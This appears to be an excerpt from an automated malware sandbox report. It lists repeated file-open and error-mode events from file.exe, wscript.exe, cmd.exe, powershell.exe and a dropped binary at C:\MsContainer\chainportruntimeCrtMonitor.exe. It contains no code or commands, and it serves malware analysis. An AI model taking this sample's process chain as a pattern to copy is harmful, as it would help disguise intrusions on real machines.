Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
